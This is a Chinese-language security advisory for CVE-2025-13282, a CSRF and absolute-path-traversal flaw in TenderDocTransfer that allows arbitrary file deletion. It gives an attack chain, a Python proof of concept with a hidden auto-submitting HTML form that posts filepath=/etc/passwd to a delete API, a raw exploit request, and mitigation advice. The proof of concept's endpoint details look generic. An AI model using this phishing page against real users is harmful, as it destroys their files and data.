CVE-2025-13282: TenderDocTransfer 存在任意文件删除漏洞

漏洞信息

漏洞编号

CVE-2025-13282

漏洞类型

任意文件删除/路径遍历/CSRF

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

TenderDocTransfer (中华电信开发)

漏洞概述

TenderDocTransfer是由中华电信开发的一款文档传输应用程序。该应用在本地搭建了一个简单的Web服务器，并提供API接口与目标网站进行通信。然而，该应用存在多个严重的安全漏洞，主要包括：1）API接口缺乏CSRF（跨站请求伪造）保护机制；2）其中一个API接口存在绝对路径遍历（Absolute Path Traversal）漏洞。这些漏洞允许未经身份认证的远程攻击者通过钓鱼攻击方式，诱骗用户访问恶意页面，利用用户浏览器向目标服务器发送携带攻击载荷的请求。由于缺乏CSRF保护，攻击者可以绕过用户认证直接调用API接口，结合路径遍历漏洞，攻击者可以指定任意文件路径，实现删除目标系统上任意文件的目的。该漏洞无需攻击者具备任何权限，也不需要特殊的系统配置，但需要用户交互（如点击钓鱼链接），CVSS评分高达8.1，属于高危漏洞。成功利用此漏洞可能导致系统文件被删除、服务中断、数据丢失等严重后果。

技术细节

TenderDocTransfer应用中的API接口存在两个关键安全缺陷：

1. CSRF保护缺失：应用提供的API接口未实现CSRF令牌验证机制。攻击者可以构造恶意HTML页面，包含自动提交表单或Fetch请求，诱骗已登录用户访问。当用户访问该页面时，浏览器会自动携带用户的认证Cookie向目标API发送请求，成功绕过同源策略限制。

2. 绝对路径遍历漏洞：其中一个关键API接口（文件删除功能）直接接受用户提供的文件路径参数，且未对路径进行安全校验。攻击者可以构造包含绝对路径的请求，如请求删除/etc/passwd或C:\Windows\System32\config\SAM等系统关键文件。由于缺乏路径规范化处理，攻击者可以直接指定任意文件路径实现删除操作。

攻击者结合这两个漏洞，可以构造钓鱼页面，当用户访问时自动发送删除任意文件的请求。由于API接口无需二次确认且缺乏路径验证，攻击者可以实现一键删除目标系统上的任意文件，包括系统配置文件、应用程序数据等。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者收集目标信息，确认目标系统运行TenderDocTransfer应用，并识别可访问的API端点

STEP 2

步骤2

钓鱼页面构建：攻击者创建包含恶意表单的HTML页面，表单自动提交到目标API，携带要删除的文件路径（如/etc/passwd）

STEP 3

步骤3

诱导访问：攻击者通过钓鱼邮件、社交工程等方式诱导用户访问恶意页面，同时确保用户本地运行着TenderDocTransfer应用

STEP 4

步骤4

CSRF触发：用户浏览器加载恶意页面后，自动向TenderDocTransfer的API发送POST请求，由于浏览器会自动携带Cookie，绕过同源策略

STEP 5

步骤5

路径遍历利用：API接收到请求后，由于缺乏路径校验，直接使用请求中的filepath参数执行文件删除操作，实现任意文件删除

STEP 6

步骤6

目标达成：系统文件被删除，可能导致服务中断、数据丢失或系统无法正常启动等严重后果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-13282 PoC - TenderDocTransfer Arbitrary File Delete
Note: This is for educational and security research purposes only.
"""

import http.server
import socketserver
from urllib.parse import parse_qs

# Malicious HTML page that exploits CSRF + Path Traversal
MALICIOUS_HTML = '''<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <h1>Page is loading, please wait...</h1>
    <form id="exploit" action="http://target:8080/api/delete" method="POST" style="display:none;">
        <input type="hidden" name="filepath" value="/etc/passwd">
        <input type="hidden" name="confirm" value="true">
    </form>
    <script>
        // Auto-submit form to exploit CSRF + Path Traversal
        document.getElementById('exploit').submit();
    </script>
</body>
</html>'''

def create_phishing_page(target_file):
    """Generate phishing page with malicious request"""
    return MALICIOUS_HTML.replace('/etc/passwd', target_file)

# Exploit request example (for reference)
EXPLOIT_REQUEST = '''POST /api/delete HTTP/1.1
Host: target:8080
Content-Type: application/x-www-form-urlencoded

filepath=/etc/passwd&confirm=true'''

if __name__ == "__main__":
    print("="*60)
    print("CVE-2025-13282 PoC - TenderDocTransfer Arbitrary File Delete")
    print("="*60)
    print("\n[1] Malicious HTML Page Content:")
    print("-"*60)
    print(create_phishing_page("/etc/passwd"))
    print("\n[2] HTTP Request to Delete Arbitrary File:")
    print("-"*60)
    print(EXPLOIT_REQUEST)
    print("\n[3] Attack Scenario:")
    print("-"*60)
    print("1. Attacker hosts malicious HTML page")
    print("2. Victim visits the page while TenderDocTransfer is running")
    print("3. Browser automatically sends CSRF request to target API")
    print("4. API deletes the specified file without CSRF validation")
    print("5. Result: Arbitrary file deletion on victim's system")

影响范围

TenderDocTransfer 所有版本（具体版本信息需参考官方公告）

防御指南

临时缓解措施

临时缓解措施：在浏览器中禁用JavaScript或使用专门的隔离环境运行TenderDocTransfer应用；限制应用的网络访问权限；定期备份系统重要文件；监控应用的网络通信日志，及时发现异常请求。长期解决方案等待厂商发布安全更新，修补CSRF保护和路径遍历漏洞。